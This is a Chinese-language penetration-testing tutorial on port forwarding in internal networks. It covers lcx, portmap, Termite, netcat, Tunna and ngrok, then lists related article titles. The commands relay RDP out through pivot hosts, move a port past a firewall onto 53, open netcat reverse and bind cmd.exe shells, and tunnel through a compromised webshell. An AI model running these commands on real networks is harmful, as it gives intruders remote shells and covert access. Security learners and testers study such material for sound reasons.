內網中的埠轉發
參考文獻:http://payloads.online/archivers/2018-02-02/1
http://www.freebuf.com/articles/web/170970.html
工具下載:https://github.com/Brucetg/Pentest-tools
使用埠轉發技術來訪問內網其他主機中,或者將內網中某個埠轉發到本地。
埠對映 :
埠對映是將一臺主機的內網(LAN)IP地址對映成一個公網(WAN)IP地址,當使用者訪問提供對映埠主機的某個埠時,伺服器將請求轉移到本地區域網內部提供這種特定服務的主機。
1.lcx
-listen <監聽埠> <轉發埠>
-tran<監聽埠> <目標地址> <目標埠>
-slave <目標主機> <目標埠> <本地主機><本機埠>
埠對映 (無法訪問內網)
A(192.168.x.xx)無法訪問B( 172.21.xx.xx)主機上的埠,但B可以訪問外網
實現內網埠轉發
//在A主機上監聽兩個埠,並將來自 8989埠的請求傳送給9898埠
A主機上執行命令:lcx.exe -listen 8989 9898
//將B主機的3389埠轉發到A主機的8989埠
B主機上執行命令:lcx.exe -slave 192.168.x.xx 8989 172.21.xx.xx 3389
linux使用方式
./portmap -m 2 -p1 8989 -p2 9898
./portmap -m 3 -h1 內網主機IP -p1 3389 -h2 公網主機ip -p2 8989
A與B建立一個通道,將9898的資料不斷的傳送到B上的目標埠,中間也包括B主機目標埠響應的資料
埠轉發 (能夠訪問內網某臺主機)
①A能訪問B主機的任何埠,但是無法訪問C主機上的埠
實現埠轉發
//B主機上監聽的埠就相當於訪問了C主機上的埠
在B主機上執行:lcx.exe -tran {監聽埠} {C主機IP地址} {C主機埠}
②由於防火牆限制,部分埠無法通過防火牆
實現本地埠轉發
//將該B主機的無法通過防火牆的3389埠透傳到防火牆允許的其他埠53
B主機上執行:lcx -tran 53 B主機ip 3389
2. Termite
這個以前總結過,就不再細說了,直接看此文章就行了https://www.jianshu.com/p/cdaf50bfe6e1
3.nc反彈
①反向連線:
//在公網主機上進行監聽:
nc -lvp 9999
//在內網主機上執行:(-t 引數是指通過telnet模式執行cmd.exe)
nc.exe -t -e cmd.exe 192.168.8.140 9999
成功後得到一個內網主機的cmd shell
②正向連線
//遠端主機上執行:
nc -l -p 4444 -t -e cmd.exe
//本地主機上執行:
nc -vv 遠端主機ip 4444
成功後得到了一個遠端主機的一個cmd shell。
4.tunna
Tunna通過HTTP協議建立一個TCP通訊隧道,屬於埠複用技術。它可以用來繞過防火牆環境中的網路限制。
--help, -h 顯示此幫助資訊並退出
--url=URL, -u URL 為遠端webshell的URL
--lport=LOCAL_PORT, -l LOCAL_PORT代表本地偵聽埠
--verbose, -v 詳細(輸出資料包大小)
--buffer=BUFFERSIZE, -b BUFFERSIZE* HTTP請求大小(一些網站對大小有限制)
--no-socks, -n 不使用 Socks 代理
--rport=REMOTE_PORT, -r REMOTE_PORT遠端服務埠,供webshell連線
--addr=REMOTE_IP, -a REMOTE_IP 遠端webshell連線到的地址(預設為 127.0.0.1)
--ping-interval=PING_DELAY, -q PING_DELAY webshprx pinging執行緒間隔(預設值為0.5)
--start-ping, -s 首先啟動ping執行緒 - 一些服務首先傳送資料(例如,SSH)
--cookie, -C 請求cookies
--authentication, -t 基本認證
A已經擁有了B主機的Webshell,但是無法對B主機的其他埠進行通訊
//將目標伺服器的3389埠轉發到本地的1234埠
python proxy.py -u {WebShell地址} -l 1234 -r 3389 -v -n -s
//將10.10.12.1伺服器的3389埠轉發到本地的1234埠
python proxy.py -u {WebShell地址} -l 1234 -r 3389 -a 10.10.12.1 -v -n -s
5.ngrok
訪問內網上的內容
//在本機上執行
python2 -m SimpleHTTPServer 80
//在內網主機上執行
`/home/cws6/Desktop/ngrok` http 80
在本機瀏覽器中訪問Forwarding
後的網址,就能訪問內網主機上的檔案。
相關文章
- 內網埠轉發小技巧內網
- 內網入口——代理搭建&埠轉發內網
- 4、內網埠轉發及穿透(合集)內網穿透
- 2、Web狗要懂的內網埠轉發Web內網
- 內網小組 | 埠轉發 全劇終內網
- 利用nginx的stream模組實現內網埠的轉發代理Nginx內網
- [ssh訪問內網伺服器]使用Natapp來進行內網埠轉發內網伺服器APP
- 5、內網滲透之埠轉發與代理工具總結內網
- vbox配置nat網路的埠轉發
- 用 IPTABLES 的埠轉發功能實現訪問位於內網的 MySQL 伺服器內網MySql伺服器
- vbox 網路地址轉換(NAT) 埠轉發
- 埠轉發方法
- SSH 埠轉發
- SSH埠轉發
- 玩轉SSH埠轉發
- 帶內串列埠 在串列埠中輸入命令串列埠
- 內網滲透—流量轉發內網
- 關於埠轉發
- 內網穿透教程,簡單,便捷,極速穿透內網埠內網穿透
- ssh埠轉發的深入例項
- 內網穿透之流量代理轉發內網穿透
- 內網滲透-隧道代理轉發內網
- 防火牆埠(中)(轉載)防火牆
- ssh埠轉發(ssh隧道)
- iptables 配置埠及轉發
- Linux IPTABLES埠轉發Linux
- Win10 埠轉發Win10
- linuxrinetd、socat埠轉發部署(很實用的網路工具)Linux
- [Tools]內網滲透SMB轉發技巧內網
- virtualbox實現區域網內訪問虛擬機器2-network新增埠轉發虛擬機
- Linux-Windows 埠轉發LinuxWindows
- [SSH服務]——SSH埠轉發
- 1、實戰SSH埠轉發
- 外網連線內部區域網的方法--ip 埠對映
- Windows 上使用 PowerShell 設定防火牆規則和埠轉發; Windows 上配置埠轉發,將 3389 埠的流量重定向到自定義埠;Windows防火牆
- 什麼是SSH埠轉發(本地轉發、遠端轉發、動態轉發)?
- 埠對映,內網網站對映外網訪問,透過80埠對映實現內網網站
- Linux埠轉發的幾種常用方法Linux